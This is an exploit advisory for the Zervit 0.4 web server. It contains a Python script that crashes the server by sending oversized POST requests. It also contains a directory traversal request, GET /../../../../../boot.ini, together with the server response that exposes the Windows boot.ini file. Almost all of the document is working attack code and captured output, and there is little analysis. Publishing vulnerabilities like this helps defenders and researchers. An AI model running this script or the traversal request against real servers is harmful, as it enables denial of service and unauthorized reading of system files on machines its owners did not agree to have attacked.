Zervit 0.4 Traversal / Memory Corruption

`####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########  
  
  
By: e.wiZz! & shinnai  
  
Site: shinnai.net & balcansecurity.com  
  
  
  
[Memory Corruption]  
########################################################################  
  
import socket  
  
host = "127.0.0.1"  
port = 8080  
  
try:  
for i in range(1,10):  
buff = "a" * 3330  
request = "POST " + buff + " HTTP/1.0"  
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connection.connect((host, port))  
connection.send(request)  
except:  
raw_input('\n\nUnable to connect. Press "Enter" to quit...')  
  
  
  
[Directory traversal]  
#################################################################################  
  
[Request]  
  
GET /../../../../../boot.ini HTTP/1.1  
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1  
Host: localhost:80  
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1  
Accept-Language: en-US,en;q=0.9  
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1  
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0  
Connection: Keep-Alive, TE  
TE: deflate, gzip, chunked, identity, trailers  
#################################################  
  
[Response]  
  
HTTP/1.1 200 OK  
Server: Zervit 0.4  
X-Powered-By: Carbono  
Connection: close  
Accept-Ranges: bytes  
Content-Type: application/octet-stream  
Content-Length: 355  
  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT  
##################################################  
  
  
`